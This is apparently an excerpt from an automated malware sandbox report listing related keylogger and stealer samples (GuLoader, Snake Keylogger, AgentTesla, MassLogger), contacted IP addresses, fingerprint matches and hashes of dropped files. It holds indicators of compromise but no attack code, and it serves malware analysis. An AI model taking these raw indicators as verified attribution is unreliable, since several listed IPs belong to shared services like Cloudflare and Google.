TELEGRAMRU | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | bvhauD4o49.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | 0CBJ3aLKx0.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
CLOUDFLARENETUS | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
CLOUDFLARENETUS | sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
CLOUDFLARENETUS | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1
CLOUDFLARENETUS | MmF9tcIj1J.exe | Get hash | malicious | FormBook | Browse | 104.21.87.37
CLOUDFLARENETUS | BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.80.1
CLOUDFLARENETUS | jki-dragon-release-online-setup.exe | Get hash | malicious | Unknown | Browse | 104.17.118.104
CLOUDFLARENETUS | lvrHOgPXr5.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
CLOUDFLARENETUS | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.64.1
CLOUDFLARENETUS | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.64.1
CLOUDFLARENETUS | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.48.1
UTMEMUS | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73
UTMEMUS | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.8.169
UTMEMUS | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
                                                                                                                            • 132.226.8.169
                                                                                                                            AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.8.169
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
    • 104.21.96.1
  OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
    • 104.21.96.1
  BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 104.21.96.1
  lvrHOgPXr5.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
    • 104.21.96.1
  s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
    • 104.21.96.1
  GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 104.21.96.1
  hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 104.21.96.1
  2Jq4fZJIJ8.exe | Get hash | malicious | GuLoader | Browse
    • 104.21.96.1
  1258ad6Jpw.exe | Get hash | malicious | GuLoader | Browse
    • 104.21.96.1
  iFoDComHqT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse
    • 104.21.96.1
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse
    • 149.154.167.220
  SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe | Get hash | malicious | PureLog Stealer | Browse
    • 149.154.167.220
  OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
    • 149.154.167.220
  GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 149.154.167.220
  hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 149.154.167.220
  ZWyrFp7WBM.exe | Get hash | malicious | AgentTesla | Browse
    • 149.154.167.220
  xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse
    • 149.154.167.220
  kbdXtadZsM.exe | Get hash | malicious | AgentTesla | Browse
    • 149.154.167.220
  NBdxPYAgZf.exe | Get hash | malicious | AgentTesla | Browse
    • 149.154.167.220
  yXsTZ347KJ.exe | Get hash | malicious | Unknown | Browse
    • 149.154.167.220
Match: 37f463bf4616ecd445d4a1937da06e19
  g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse
    • 172.217.18.97
    • 142.250.184.206
  BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 172.217.18.97
    • 142.250.184.206
  GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 172.217.18.97
    • 142.250.184.206
  hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 172.217.18.97
    • 142.250.184.206
  2Jq4fZJIJ8.exe | Get hash | malicious | GuLoader | Browse
    • 172.217.18.97
    • 142.250.184.206
  GyGE2VaBFL.exe | Get hash | malicious | GuLoader | Browse
    • 172.217.18.97
    • 142.250.184.206
  1258ad6Jpw.exe | Get hash | malicious | GuLoader | Browse
    • 172.217.18.97
    • 142.250.184.206
  ZUY4Nq2SyY.exe | Get hash | malicious | GuLoader | Browse
    • 172.217.18.97
    • 142.250.184.206
  cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 172.217.18.97
    • 142.250.184.206
  axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
    • 172.217.18.97
    • 142.250.184.206
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dll
  BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
  GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
  Steel Sample- QUOTE.exe | Get hash | malicious | FormBook, GuLoader | Browse
  Steel Sample- QUOTE.exe | Get hash | malicious | FormBook, GuLoader | Browse
  Skambenets.exe | Get hash | malicious | GuLoader | Browse
  Skambenets.exe | Get hash | malicious | GuLoader | Browse
  Marcom Trade SS-04665.exe | Get hash | malicious | Remcos, GuLoader | Browse
  Hermaean.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse
  SecuriteInfo.com.FileRepMalware.23885.29286.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
  SecuriteInfo.com.FileRepMalware.24375.4894.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
Process: C:\Users\user\Desktop\GBYfjUz4a5.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 33
Entropy (8bit): 4.33197669498491
Encrypted: false
SSDEEP: 3:U4ooQGRDWh:hooQh
MD5: 340AD700CF73B73EA2313C044D40EA9A
SHA1: 9B90CC3147D140FA936E308C2C320BDC385DA93A
SHA-256: 55A2B8F5EF1D17023FD8245E69830CC961C0CE629EDDC7AC1043C288CB3915B5
SHA-512: 4B31D10B80AE71197AC367C868569949224A4CD542BF0E9C188B816348EC8958F952525F939C827BDDC8610F268DD12E310D6D2FC99071C741B3A38E062542B4
Malicious: false
Reputation: low
Preview: [Chocho240]..struct=finkulturel..

Process: C:\Users\user\Desktop\GBYfjUz4a5.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 47
Entropy (8bit): 4.628848957968553
Encrypted: false
SSDEEP: 3:YOm45GXQLQIfLBJXmgxv:5TGXQkIP2I
MD5: B895D576D6637A778B387B2FCA0F56EC
SHA1: